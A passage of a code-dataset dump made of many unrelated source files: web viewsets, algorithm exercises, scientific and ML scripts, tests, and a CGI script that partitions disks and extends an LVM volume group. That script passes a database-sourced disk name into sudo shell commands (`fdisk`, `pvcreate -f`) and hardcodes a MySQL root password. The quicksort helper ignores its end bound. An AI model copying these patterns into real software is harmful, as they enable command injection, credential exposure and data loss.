procedure_s9ViewSet(viewsets.ModelViewSet):\n \"\"\"ViewSet for the procedure_s9 class\"\"\"\n\n queryset = models.procedure_s9.objects.all()\n serializer_class = serializers.procedure_s9Serializer\n permission_classes = [permissions.IsAuthenticated]\n\n\nclass chantier_seViewSet(viewsets.ModelViewSet):\n \"\"\"ViewSet for the chantier_se class\"\"\"\n\n queryset = models.chantier_se.objects.all()\n serializer_class = serializers.chantier_seSerializer\n permission_classes = [permissions.IsAuthenticated]\n\n\nclass ttxViewSet(viewsets.ModelViewSet):\n \"\"\"ViewSet for the ttx class\"\"\"\n\n queryset = models.ttx.objects.all()\n serializer_class = serializers.ttxSerializer\n permission_classes = [permissions.IsAuthenticated]\n\n\nclass personelViewSet(viewsets.ModelViewSet):\n \"\"\"ViewSet for the personel class\"\"\"\n\n queryset = models.personel.objects.all()\n serializer_class = serializers.personelSerializer\n permission_classes = [permissions.IsAuthenticated]\n\n\nclass info_chantierViewSet(viewsets.ModelViewSet):\n \"\"\"ViewSet for the info_chantier class\"\"\"\n\n queryset = models.info_chantier.objects.all()\n serializer_class = serializers.info_chantierSerializer\n permission_classes = [permissions.IsAuthenticated]\n","sub_path":"logiciel_s6/logiciel_s6_project/info_base_chantier/api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":1345,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"277056358","text":"\n\nfrom xai.brain.wordbase.nouns._price import _PRICE\n\n#calss header\nclass _PRICES(_PRICE, ):\n\tdef __init__(self,): \n\t\t_PRICE.__init__(self)\n\t\tself.name = \"PRICES\"\n\t\tself.specie = 'nouns'\n\t\tself.basic = \"price\"\n\t\tself.jsondata = {}\n","sub_path":"xai/brain/wordbase/nouns/_prices.py","file_name":"_prices.py","file_ext":"py","file_size_in_byte":231,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"234629302","text":"# Prompt: https://leetcode.com/problems/intersection-of-two-arrays/\n\n# Runtime: 44 ms, faster than 36.06% of Python online submissions for Intersection of Two Arrays.\n# Memory Usage: 11.9 MB, less than 5.86% of Python online submissions for Intersection of Two Arrays.\n\nclass Solution(object):\n def intersection(self, nums1, nums2):\n bigger = nums1 if len(nums1) > len(nums2) else nums2\n smaller = nums2 if len(nums1) > len(nums2) else nums1\n # turn smaller list into a set\n smaller = set(smaller)\n # loop through bigger list & see if any in there are in smaller set\n output = []\n for elem in bigger:\n if elem in smaller:\n output.append(elem)\n smaller.remove(elem)\n return output\n","sub_path":"0. Easy/0349. Intersection of Two Arrays/array_intersect.py","file_name":"array_intersect.py","file_ext":"py","file_size_in_byte":780,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"14530043","text":"#!/usr/bin/python\n\n# -*- coding: utf-8 -*-\n\n# For better print formatting\nfrom __future__ import print_function\n\n# Imports\nfrom pycompss.api.constraint import constraint\nfrom pycompss.api.task import task\nfrom pycompss.api.api import compss_barrier\nfrom pycompss.api.api import compss_wait_on\n\nimport numpy as np\n\n\n############################################\n# MATRIX GENERATION\n############################################\n\ndef generate_matrix(m_size, b_size):\n mat = []\n for i in range(m_size):\n mat.append([])\n for _ in range(m_size):\n mat[i].append([])\n\n for i in range(m_size):\n mat[i][i] = create_block(b_size, True)\n for j in range(i + 1, m_size):\n mat[i][j] = create_block(b_size, False)\n\n # Make it symmetric\n for i in range(m_size):\n mat[i][i] = compss_wait_on(mat[i][i])\n for j in range(i + 1, m_size):\n mat[i][j] = compss_wait_on(mat[i][j]) # To break aliasing between future objects\n mat[j][i] = mat[i][j]\n\n return mat\n\n\n@constraint(ComputingUnits=\"${ComputingUnits}\")\n@task(returns=list)\ndef create_block(b_size, is_diag):\n import os\n np.random.seed(ord(os.urandom(1)))\n block = np.array(np.random.random((b_size, b_size)), dtype=np.float64, copy=False)\n\n mb = np.matrix(block, dtype=np.float64, copy=False)\n mb = mb + np.transpose(mb)\n if is_diag:\n mb = mb + 2 * b_size * np.eye(b_size)\n return mb\n\n\n############################################\n# MAIN FUNCTION\n############################################\n\ndef cholesky_blocked(a, m_size, b_size):\n # Debug\n if __debug__:\n a = compss_wait_on(a)\n print(\"Matrix A:\")\n print(a)\n\n # Compute expected result\n if __debug__:\n from numpy.linalg import cholesky as cholesky_numpy\n res_expected = cholesky_numpy(join_matrix(a))\n\n # Cholesky decomposition\n for k in range(m_size):\n # Diagonal block factorization\n a[k][k] = potrf(a[k][k])\n\n # Triangular systems\n for i in range(k + 1, m_size):\n a[i][k] = solve_triangular(a[k][k], a[i][k])\n a[k][i] = np.zeros((b_size, b_size))\n\n # Update trailing matrix\n for i in range(k + 1, m_size):\n for j in range(i, m_size):\n a[j][i] = gemm(-1.0, a[j][k], a[i][k], a[j][i], 1.0)\n # Only for A=B\n # a[j][i] = syrk(a[j][k], a[j][i])\n\n # Debug result\n if __debug__:\n a = compss_wait_on(a)\n res = join_matrix(a)\n\n print(\"New Matrix A:\")\n print(res)\n\n # Check result\n if __debug__:\n check_result(res, res_expected)\n\n\n############################################\n# MATHEMATICAL FUNCTIONS\n############################################\n\n@constraint(ComputingUnits=\"${ComputingUnits}\")\n@task(returns=list)\ndef potrf(a):\n from scipy.linalg.lapack import dpotrf\n a = dpotrf(a, lower=True)[0]\n return a\n\n\n@constraint(ComputingUnits=\"${ComputingUnits}\")\n@task(returns=list)\ndef solve_triangular(a, b):\n from scipy.linalg import solve_triangular\n from numpy import transpose\n\n b = transpose(b)\n b = solve_triangular(a, b, lower=True)\n b = transpose(b)\n return b\n\n\n@constraint(ComputingUnits=\"${ComputingUnits}\")\n@task(returns=list)\ndef gemm(alpha, a, b, c, beta):\n from scipy.linalg.blas import dgemm\n from numpy import transpose\n\n b = transpose(b)\n c = dgemm(alpha, a, b, c=c, beta=beta)\n return c\n\n\n@constraint(ComputingUnits=\"${ComputingUnits}\")\n@task(returns=list)\ndef syrk(a, b):\n from scipy.linalg.blas import dsyrk\n\n alpha = -1.0\n beta = 1.0\n b = dsyrk(alpha, a, c=b, beta=beta, lower=True)\n return b\n\n\n############################################\n# BLOCK HANDLING FUNCTIONS\n############################################\n\ndef join_matrix(a):\n joint_matrix = np.matrix([[]])\n for i in range(0, len(a)):\n current_row = a[i][0]\n for j in range(1, len(a[i])):\n current_row = np.bmat([[current_row, a[i][j]]])\n if i == 0:\n joint_matrix = current_row\n else:\n joint_matrix = np.bmat([[joint_matrix], [current_row]])\n\n return np.matrix(joint_matrix)\n\n\ndef check_result(result, result_expected):\n is_ok = np.allclose(result, result_expected)\n print(\"Result check status: \" + str(is_ok))\n\n if not is_ok:\n raise Exception(\"Result does not match expected result\")\n\n\n############################################\n# MAIN\n############################################\n\nif __name__ == \"__main__\":\n # Import libraries\n import time\n\n # Parse arguments\n import sys\n\n args = sys.argv[1:]\n MSIZE = int(args[0])\n BSIZE = int(args[1])\n\n # Log arguments if required\n if __debug__:\n print(\"Running cholesky application with:\")\n print(\" - MSIZE = \" + str(MSIZE))\n print(\" - BSIZE = \" + str(BSIZE))\n\n # Initialize matrix\n if __debug__:\n print(\"Initializing matrix\")\n start_time = time.time()\n A = generate_matrix(MSIZE, BSIZE)\n compss_barrier()\n\n # Begin computation\n if __debug__:\n print(\"Performing computation\")\n cholesky_start_time = time.time()\n cholesky_blocked(A, MSIZE, BSIZE)\n compss_barrier(True)\n end_time = time.time()\n\n # Log results and time\n if __debug__:\n print(\"Post-process results\")\n total_time = end_time - start_time\n init_time = cholesky_start_time - start_time\n cholesky_time = end_time - cholesky_start_time\n\n print(\"RESULTS -----------------\")\n print(\"VERSION USERPARALLEL\")\n print(\"MSIZE \" + str(MSIZE))\n print(\"BSIZE \" + str(BSIZE))\n print(\"DEBUG \" + str(__debug__))\n print(\"TOTAL_TIME \" + str(total_time))\n print(\"INIT_TIME \" + str(init_time))\n print(\"CHOLESKY_TIME \" + str(cholesky_time))\n print(\"-------------------------\")\n","sub_path":"examples/cholesky/userparallel/cholesky.py","file_name":"cholesky.py","file_ext":"py","file_size_in_byte":5851,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"397421173","text":"# # # # # # # # # # # HEADER # # # # # # # # # # #\n# #\n# STUDENT: Amanda Carrijo Viana Figur #\n# N. USP: 8937736 #\n# STUDENT: Luiz Augusto Vieira Manoel #\n# N. USP: 8937308 #\n# COURSE: Mestrado em Ciências de Computação e #\n# Matemática Computacional (PPG-CCMC) #\n# YEAR OF ENTRY: 2020/2019 #\n# \t FINAL PROJECT\t\t #\n# \t INPAINTG POPULAR\t\t #\n# #\n# # # # # # # # # # # # # # # # # # # # # # # # # ##\n\nimport imageio\nimport matplotlib.pyplot as plt\nimport numpy as np\nfrom skimage import morphology as morp # implements the morphology functions\nfrom plot_compare import plot_compare\nimport sys\n\n#Searchs each input_img pixels until finds white mask pixels\ndef inpainting_popular(input_img, mask):\n\n\tN, M = input_img.shape[0:2]\n\tr = input_img.copy()\n\tfor i in range(0, N):\n\t\tfor j in range(0, M):\n\t\t\tif mask[i,j,0] == 255:\n\t\t\t\tinpainting_search(r, mask, i, j)\n\n\treturn r\n\n#Do the inpainting on the pixel\ndef inpainting_search(input_img, mask, i, j):\n\n\tk = 2\n\tinpainted = False\n\n\twhile(not inpainted):\n\n\t\t#The subregion to find pixels outside mask\n\t\tsub_region_base = morp.disk(k)\n\n\t\t#Generates a subregion of size 2k + 1 around pixel to be inpainted\n\t\tsub_region_input = input_img[i - k: i + k + 1, j - k:j + k + 1]\n\t\tsub_region_mask = mask[i - k: i + k + 1, j - k:j + k + 1]\n\n\t\t#searches every pixel of the subregion\n\t\tfor x in range(0, ((2*k) +1)):\n\t\t\tfor y in range(0, ((2*k) +1)):\n\t\t\t\t#if pixel is inside sub_region_base and outside mask, then inpainting occurs\n\t\t\t\tif sub_region_base[x,y] == 1 and sub_region_mask[x,y,0] == 0:\n\t\t\t\t\tinput_img[i,j,:] = sub_region_input[x,y,:] #inpaint respective RGB channels\n\t\t\t\t\tinpainted = True\n\n\t\tk += 1 #keeps searching for adequate subregion","sub_path":"inpanting_popular.py","file_name":"inpanting_popular.py","file_ext":"py","file_size_in_byte":1963,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"338526365","text":"from lprec import lpTransform\nimport numpy as np\nimport struct\n\n\ndef test_adj():\n N = 512\n Nproj = int(3*N/2)\n Nslices = 1\n filter_type = 'None'\n cor = N / 2\n interp_type = 'cubic'\n gpu = 0\n\n f = np.float32(np.random.random([Nslices, N, N]))\n R = np.float32(np.random.random([Nslices, Nproj, N]))\n\n lp = lpTransform.lpTransform(\n N, Nproj, Nslices, filter_type, cor, interp_type)\n lp.precompute(1)\n lp.initcmem(1, gpu)\n\n Rf = lp.fwd(f, gpu)\n frec = lp.adj(R, gpu)\n Rrec = lp.fwd(frec, gpu)\n\n # scale test\n RR = lp.fwd(lp.adj(R, gpu), gpu)\n scale = np.sum(np.float64(R*RR))/np.sum(np.float64(RR*RR))\n\n # dot product test\n sum1 = sum(np.float64(np.ndarray.flatten(Rrec)*np.ndarray.flatten(R)))\n sum2 = sum(np.float64(np.ndarray.flatten(frec)*np.ndarray.flatten(frec)))\n err = np.linalg.norm(sum1-sum2)/np.linalg.norm(sum2)\n print([scale, err])\n return [scale, err]\n\n\nif __name__ == '__main__':\n test_adj()\n","sub_path":"tests/test_adj.py","file_name":"test_adj.py","file_ext":"py","file_size_in_byte":986,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"271160491","text":"import gym\nimport numpy as np\n\nfrom gym import spaces\nfrom dm_alchemy import symbolic_alchemy\nfrom dm_alchemy.encode import chemistries_proto_conversion\nfrom dm_alchemy.types.utils import ChemistrySeen, ElementContent\n\nLEVEL_NAME = 'alchemy/perceptual_mapping_randomized_with_rotation_and_random_bottleneck'\nCHEM_NAME = 'chemistries/perceptual_mapping_randomized_with_random_bottleneck/chemistries'\n\nclass AlchemyEnv(gym.Env):\n\n def __init__(self, num_trials=10, num_stones_per_trial=3, num_potions_per_trial=12, max_steps_per_trial=20, fixed=False):\n super(AlchemyEnv, self).__init__()\n\n self.num_stones_per_trial = num_stones_per_trial\n self.num_potions_per_trial = num_potions_per_trial\n\n self.seed()\n self.fixed = fixed\n ground_truth = ChemistrySeen(content=ElementContent.GROUND_TRUTH)\n if self.fixed:\n chems = chemistries_proto_conversion.load_chemistries_and_items(CHEM_NAME)\n self.env = symbolic_alchemy.get_symbolic_alchemy_fixed(chemistry=chems[0][0], episode_items=chems[0][1], see_chemistries={'task': ground_truth})\n else:\n self.env = symbolic_alchemy.get_symbolic_alchemy_level(level_name=LEVEL_NAME, num_trials=num_trials, num_stones_per_trial=num_stones_per_trial, num_potions_per_trial=num_potions_per_trial, max_steps_per_trial=max_steps_per_trial, see_chemistries={'task': ground_truth})\n\n self._max_episode_steps = self.env.max_steps_per_trial\n self.step_count = 0\n\n obs_dim = num_stones_per_trial * 5 + num_potions_per_trial * 2\n act_dim = 1 + num_stones_per_trial * (1 + num_potions_per_trial)\n self.observation_space = spaces.Box(low=-1, high=2, shape=(obs_dim,))\n self.action_space = spaces.Discrete(act_dim)\n self.task_dim = 28\n\n self.reset_task()\n\n def step(self, action):\n \"\"\"\n Execute one step in the environment.\n Should return: state, reward, done, info\n where info has to include a field 'task'.\n \"\"\"\n if isinstance(action, np.ndarray) and action.ndim == 1:\n action = action[0]\n self.timestep = self.env.step(action)\n\n return self._reduce_obs(self.timestep.observation['symbolic_obs']), self.timestep.reward, self.env.is_new_trial(), {'task': self.timestep.observation['task']}\n\n def reset(self):\n \"\"\"\n Reset the environment. This should *NOT* automatically reset the task!\n Resetting the task is handled in the varibad wrapper (see wrappers.py).\n\n Completed automatically by Alchemy when trial is done.\n \"\"\"\n if not self.env.is_new_trial():\n raise Exception(\"Alchemy reset not on trial boundary.\")\n return self._reduce_obs(self.timestep.observation['symbolic_obs'])\n\n def _reduce_obs(self, obs):\n return obs[np.r_[0:self.num_stones_per_trial*5, 15:15+self.num_potions_per_trial*2]]\n\n def get_task(self):\n \"\"\"\n Return a task description, such as goal position or target velocity.\n \"\"\"\n return self.timestep.observation['task']\n\n def reset_task(self, task=None):\n \"\"\"\n Reset the task, either at random (if task=None) or the given task.\n Should *not* reset the environment.\n \"\"\"\n self.timestep = self.env.reset()\n return self.timestep.observation['task']\n\n # def visualise_behaviour(self,\n # env,\n # args,\n # policy,\n # iter_idx,\n # encoder=None,\n # reward_decoder=None,\n # state_decoder=None,\n # task_decoder=None,\n # image_folder=None,\n # **kwargs):\n # \"\"\"\n # Optional. If this is not overwritten, a default visualisation will be used (see utils/evaluation.py).\n # Should return the following:\n # episode_latent_means, episode_latent_logvars, episode_prev_obs,\n # episode_next_obs, episode_actions, episode_rewards, episode_returns\n # where each element is either a list of length num_episodes,\n # or \"None\" if not applicable.\n # \"\"\"\n # pass\n","sub_path":"environments/alchemy/alchemy.py","file_name":"alchemy.py","file_ext":"py","file_size_in_byte":4284,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"364942445","text":"import logging\nfrom collections import Counter\nfrom enum import Enum\nfrom typing import Dict, List\n\nimport numpy as np\nfrom sklearn.cluster import AgglomerativeClustering\nfrom sklearn.feature_extraction import DictVectorizer\nfrom sklearn.feature_extraction.text import TfidfTransformer\nfrom sklearn.pipeline import make_pipeline\n\nimport torch\nfrom pytorch_pretrained_bert import BertModel, BertTokenizer\n\n\ndef load_embedding(data_path:str) -> Dict[str, List[float]]:\n ''' load embedding '''\n with open(data_path) as f:\n origin_embed = [ii.strip() for ii in f.readlines()]\n embed = {ii.split(' ')[0]: np.array(ii.split(' ')[1:]).astype(float) for ii in origin_embed}\n return embed\n\nclass EMBED_TYPE(Enum):\n FastText = 0\n Glove = 1\n BERT = 2\n ONE_HOT = 3\n TF_IDF = 4\n\nembedType = EMBED_TYPE.FastText\n\nif embedType == EMBED_TYPE.BERT:\n bert_dir = '../bert'\n bert = BertModel.from_pretrained(bert_dir)\n tokenizer = BertTokenizer.from_pretrained(f'{bert_dir}/uncased_L-24_H-1024_A-16/vocab.txt')\nelif embedType == EMBED_TYPE.Glove or embedType == EMBED_TYPE.FastText:\n if embedType == EMBED_TYPE.FastText:\n embed_path = '../wiki-news-300d-1M-subword.vec'\n else:\n embed_path = '../glove.840B.300d.txt' \n embed = load_embedding(embed_path)\n\ndef get_embed(word:str)->List[float]:\n if word in embed:\n return embed[word]\n else:\n return np.zeros(300)\n\n\ndef cluster_inst_ids_representatives(inst_ids_to_representatives: Dict[str, List[Dict[str, int]]],\n n_clusters: int, disable_tfidf: bool) -> Dict[str, Dict[str, int]]:\n \"\"\"\n preforms agglomerative clustering on representatives of one SemEval target\n :param inst_ids_to_representatives: map from SemEval instance id to list of representatives\n :param n_clusters: fixed number of clusters to use\n :param disable_tfidf: disable tfidf processing of feature words\n :return: map from SemEval instance id to soft membership of clusters and their weight\n \"\"\"\n inst_ids_ordered = list(inst_ids_to_representatives.keys())\n lemma = inst_ids_ordered[0].rsplit('.', 1)[0]\n logging.info('clustering lemma %s' % lemma)\n representatives = [y for x in inst_ids_ordered for y in inst_ids_to_representatives[x]]\n n_represent = len(representatives) // len(inst_ids_ordered)\n to_pipeline = [DictVectorizer()]\n if embedType == EMBED_TYPE.BERT:\n waitSentence = [' '.join(ii) for ii in representatives]\n transformed = []\n for ii in waitSentence:\n ids = torch.tensor([tokenizer.convert_tokens_to_ids(tokenizer.tokenize(ii))])\n transformed.append(bert(ids, output_all_encoded_layers=False)[-1][0].detach().numpy())\n elif embedType == EMBED_TYPE.Glove or embedType == EMBED_TYPE.FastText:\n transformed = [sum([get_embed(jj) for jj in ii]) for ii in representatives]\n else:\n if embedType == EMBED_TYPE.TF_IDF:\n to_pipeline.append(TfidfTransformer())\n data_transformer = make_pipeline(*to_pipeline)\n transformed = data_transformer.fit_transform(representatives).todense()\n clustering = AgglomerativeClustering(n_clusters=n_clusters, linkage='average', affinity='cosine')\n clustering.fit(transformed)\n senses = {}\n for i, inst_id in enumerate(inst_ids_ordered):\n inst_id_clusters = Counter(clustering.labels_[i * n_represent: (i + 1) * n_represent])\n senses[inst_id] = dict([('%s.sense.%d' % (lemma, k), v) for (k, v) in inst_id_clusters.most_common()])\n return senses\n","sub_path":"spwsi/wsi_clustering.py","file_name":"wsi_clustering.py","file_ext":"py","file_size_in_byte":3562,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"419096901","text":"# ----------------------------------------------------------------------------\n# Copyright (c) 2016-2020, QIIME 2 development team.\n#\n# Distributed under the terms of the Modified BSD License.\n#\n# The full license is in the file LICENSE, distributed with this software.\n# ----------------------------------------------------------------------------\n\nimport unittest\n\nfrom qiime2.plugin.testing import TestPluginBase\nfrom qiime2 import Artifact\n\n\nclass AlignToTreeMafftIqtreePipelineTest(TestPluginBase):\n package = 'q2_iqtree2.tests'\n\n def setUp(self):\n super().setUp()\n self.align_to_tree_mafft_iqtree = self.plugin.pipelines[\n 'align_to_tree_mafft_iqtree']\n\n input_sequences_fp = self.get_data_path('dna-sequences-1.fasta')\n self.input_sequences = Artifact.import_data('FeatureData[Sequence]',\n input_sequences_fp)\n\n def test_execution(self):\n # Does it run?\n self.align_to_tree_mafft_iqtree(self.input_sequences)\n self.assertTrue(True)\n\n def test_outputs(self):\n result = self.align_to_tree_mafft_iqtree(self.input_sequences)\n self.assertEqual(4, len(result))\n aligned_seq, masked_seq, unrooted_tree, rooted_tree = result\n self.assertEqual('FeatureData[AlignedSequence]', str(aligned_seq.type))\n self.assertEqual('FeatureData[AlignedSequence]', str(masked_seq.type)),\n self.assertEqual('Phylogeny[Unrooted]', str(unrooted_tree.type)),\n self.assertEqual('Phylogeny[Rooted]', str(rooted_tree.type))\n\n\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"q2_iqtree2/tests/test_align_to_tree_mafft_iqtree2.py","file_name":"test_align_to_tree_mafft_iqtree2.py","file_ext":"py","file_size_in_byte":1645,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"241559857","text":"def make_divisors(n):\n '''\n nの約数リストを返す\n '''\n divisors = []\n for i in range(1, int(n**0.5)+1):\n if n % i == 0 and i % 2 == 1:\n divisors.append(i)\n if i != n // i and n//i % 2 == 1:\n divisors.append(n//i)\n # divisors.sort()\n return divisors\n\n\nN = int(input())\nans = 0\nfor i in range(1, N+1):\n divisors = make_divisors(i)\n if len(divisors) == 8:\n ans += 1\nprint(ans)\n","sub_path":"abc106/b.py","file_name":"b.py","file_ext":"py","file_size_in_byte":460,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"556276231","text":"\"\"\"\nImplement Quick Sort\n\nDone in two parts. Much in the same way as merge sort.\nMeaning there will be a number of recursive calls using\na helper method that is outside the original function. \n\"\"\"\n\n\"\"\"\nThis pivot function will choose a pivot point. And then\nproceed to put everything less then the pivot on one side.\nAnd then proceed to put everything bigger on the other.\nAnd it will do all of this inplace without using another array.\n\"\"\"\ndef pivot(arr, start = 0, end = None):\n if end == None:\n end = len(arr)-1\n\n try:\n pivotp = arr[start]\n except IndexError:\n print(\"YOLO\")\n\n pivotindex = start\n\n for x in range(start+1,len(arr)):\n if pivotp > arr[x]:\n # here if we find something greater then the pivot\n # we increase the pivot index by one. And then proceed\n # to swap the value at the new pivotindex and thing we \n # just found that is crater than the pivotp\n # we started from start+1 so that we will never touch\n # the pivot point in this loop\n pivotindex+=1\n arr[pivotindex], arr[x] = arr[x], arr[pivotindex]\n\n # here at the very end, we do our final swap\n # to put the pivot where it belongs, which is where \n # the pivotindex is pointing to\n arr[start], arr[pivotindex] = arr[pivotindex], arr[start]\n\n # and here the very last thing we do is return the index\n # of the pivot in the array\n return pivotindex\n\n\ndef QuickSort(arr, start = 0, end = None):\n if end == None:\n end = len(arr) - 1\n \n\n\n if start < end:# can not do this since arr size will always be constant - len(arr) != 1:\n pivotIndex = pivot(arr,start,end) # has to be inside base case\n # since what if start > end gets passed to it ?\n # try:\n # pivotp = arr[start]\n # except IndexError:\n # print(\"YOLO\")\n\n # here we are doing the left side of the array\n # everything less then the pivot\n QuickSort(arr,start,pivotIndex-1) #not exactly the pivot index but one less\n # since we only want a subset of the array\n\n # here we are doing the right side of the array\n # everything greater then the pivot\n QuickSort(arr,pivotIndex+1,end) # this calls not have any absolute values\n # these calls can only ever have the information that is pass to it \n # so as whats inside pivotindex and end\n\n return arr\n\n\nif __name__ == \"__main__\":\n print(QuickSort([4,86,2,16,5,7,66,36]))\n","sub_path":"Old/ColtSteele/Sorting/QuickSort.py","file_name":"QuickSort.py","file_ext":"py","file_size_in_byte":2525,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"200280917","text":"# --------------------------------------------------------------------------------------------\n# Copyright (c) Microsoft Corporation. All rights reserved.\n# Licensed under the MIT License. See License.txt in the project root for license information.\n# --------------------------------------------------------------------------------------------\n\n\nfrom azure.cli.core.commands import CliCommandType\nfrom azext_devops.dev.common.exception_handler import azure_devops_exception_handler\nfrom ._format import (transform_work_item_table_output,\n transform_work_item_query_result_table_output)\n\n\nworkItemOps = CliCommandType(\n operations_tmpl='azext_devops.dev.boards.work_item#{}',\n exception_handler=azure_devops_exception_handler\n)\n\n\ndef load_work_commands(self, _):\n with self.command_group('boards', command_type=workItemOps) as g:\n # basic work item commands\n g.command('work-item show', 'show_work_item', table_transformer=transform_work_item_table_output)\n g.command('work-item create', 'create_work_item', table_transformer=transform_work_item_table_output)\n g.command('work-item update', 'update_work_item', table_transformer=transform_work_item_table_output)\n g.command('work-item delete', 'delete_work_item',\n confirmation='Are you sure you want to delete this work item?')\n\n # query commands\n g.command('query', 'query_work_items', table_transformer=transform_work_item_query_result_table_output)\n","sub_path":"azure-devops/azext_devops/dev/boards/commands.py","file_name":"commands.py","file_ext":"py","file_size_in_byte":1499,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"523344898","text":"import tornado.web\nimport tornado.ioloop\nimport sqlite3\n\nclass AddWeb(tornado.web.RequestHandler):\n def get(self):\n base = sqlite3.connect(\"../datos.db\")\n\n cursor = base.cursor()\n\n cursor.execute(\"SELECT categoria FROM food\")\n\n data = cursor.fetchall()\n\n categorias = []\n\n for element in data:\n if element[0] not in categorias:\n categorias.append(element[0])\n\n self.render(\"add.html\", categories=categorias)\n\n def post(self):\n base = sqlite3.connect(\"../datos.db\")\n\n cursor = base.cursor()\n\n name = self.get_argument(\"name\")\n quantity = self.get_argument(\"quantity\")\n category = self.get_argument(\"category\")\n\n print(quantity)\n\n quantity = int(quantity)\n\n print(quantity)\n\n try:\n cursor.execute(\"INSERT INTO food(nombre, cantidad, categoria) VALUES(?, ?, ?)\", (name, quantity, category))\n\n except sqlite3.IntegrityError:\n cursor.execute(\"SELECT cantidad FROM food WHERE nombre=?\", (name,))\n\n quantity = cursor.fetchall()[0][0] + quantity\n\n print(quantity)\n\n cursor.execute(\"UPDATE food SET cantidad=? WHERE nombre=?\", (quantity, name))\n\n base.commit()\n\n self.get()","sub_path":"server/add.py","file_name":"add.py","file_ext":"py","file_size_in_byte":1284,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"18757198","text":"import math\nimport os\nimport sys\nimport imutils\nimport cv2\nfrom google_speech import Speech\nimport tensorflow as tf\n\nos.environ['TF_CPP_MIN_LOG_LEVEL'] = '2'\n\nimage_path = sys.argv[1]\n\n# image = cv2.imread(image_path)\n# image = imutils.rotate(image, 270)\n# cv2.imwrite('image.jpg', image)\n# # change this as you see fit\n#\n# image_path = \"image.jpg\"\n\n\n# Read in the image_data\nimage_data = tf.gfile.FastGFile(image_path, 'rb').read()\n\n# Loads label file, strips off carriage return\nlabel_lines = [line.rstrip() for line\n in tf.gfile.GFile(\"retrained_labels.txt\")]\n\n# Unpersists graph from file\nwith tf.gfile.FastGFile(\"retrained_graph.pb\", 'rb') as f:\n graph_def = tf.GraphDef()\n graph_def.ParseFromString(f.read())\n tf.import_graph_def(graph_def, name='')\n\nwith tf.Session() as sess:\n # Feed the image_data as input to the graph and get first prediction\n softmax_tensor = sess.graph.get_tensor_by_name('final_result:0')\n\n predictions = sess.run(softmax_tensor,\n {'DecodeJpeg/contents:0': image_data})\n\n # Sort to show labels of first prediction in order of confidence\n top_k = predictions[0].argsort()[-len(predictions[0]):][::-1]\n\n speak_string = \"This looks like Rupees \"\n # Display the predicted result\n for node_id in top_k[0:1]:\n human_string = label_lines[node_id]\n score = predictions[0][node_id]\n speak_string = speak_string + str(human_string) + \" probability is \"\n format_score = score * 100\n format_score = math.ceil(format_score * 100) / 100\n speak_string = speak_string + str(format_score)\n print('%s (score = %.5f)' % (human_string, format_score))\n # os.system(\"google_speech -l en \" + speak_string)\n speech = Speech(speak_string, lang=\"en\")\n sox_effects = (\"speed\", \"1\")\n speech.play(sox_effects)\n","sub_path":"classify_note/classify.py","file_name":"classify.py","file_ext":"py","file_size_in_byte":1862,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"170996331","text":"#!/usr/bin/python36\t\t\nprint(\"content-type:text/html\")\nprint(\"\\n\")\n\nimport subprocess as sp\nimport cgitb\nimport pymysql\npymysql.install_as_MySQLdb()\nimport MySQLdb\ncgitb.enable()\n\n\ndb = MySQLdb.connect(host=\"localhost\",user=\"root\",passwd=\"7742Jain!!\",db=\"PROJECT\")\ncur = db.cursor()\n\ncur.execute(\"select name from disc\")\nres = cur.fetchall()\ndisc = res[0][0]\n\n\npartition = sp.getstatusoutput(\"sudo echo -e 'n\\np\\n1\\n\\n\\n\\nw' | sudo fdisk /dev/{}\".format(disc))\t\nif partition[0] == 0:\n\t\n\tsp.getstatusoutput(\"sudo partprobe\")\nelse:\n\tprint(\"Failed to extend the Disk Storage System.
Check system logs for more details!\")\n\texit()\n\n\npvcreate = sp.getstatusoutput(\"sudo pvcreate /dev/{}1 -f\".format(disc))\nif pvcreate[0] == 0:\n\tprint(pvcreate[1],\"
\")\nelse:\n\tprint(pvcreate,\"
\")\n\tprint(\"Failed to create PV\")\n\texit()\n\n\t\nvgextend = sp.getstatusoutput(\"sudo vgextend {} /dev/{}1 -f\".format('staas',disc))\nif vgextend[0] == 0:\n\tprint(vgextend[1],\"
\")\nelse:\n\tprint(vgextend)\n\tprint(\"Failed in vg extention\")\n\texit()\n\ncur.execute(\"delete from disc where name = '{}'\".format(disc))\nprint(\"

Successfully added space!\")\ndb.commit()\ndb.close()\n","sub_path":"Client/vgextend.py","file_name":"vgextend.py","file_ext":"py","file_size_in_byte":1153,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"610282400","text":"\"\"\"\nDefinitions of various types of fields. Supports JSON draft4 types.\n\"\"\"\nimport enum\nimport re\nfrom abc import ABC\nfrom collections import OrderedDict\nfrom copy import deepcopy\nfrom functools import reduce\nfrom decimal import Decimal, InvalidOperation\n\nfrom typedpy.structures import (\n Field,\n Structure,\n TypedField,\n ClassReference,\n StructMeta,\n is_function_returning_field,\n)\n\n\ndef _map_to_field(item):\n if isinstance(item, StructMeta) and not isinstance(item, Field):\n return ClassReference(item)\n if item in [None, \"\"] or isinstance(item, Field):\n return item\n elif Field in getattr(item, \"__mro__\", []):\n return item()\n else:\n raise TypeError(\"Expected a Field/Structure class or Field 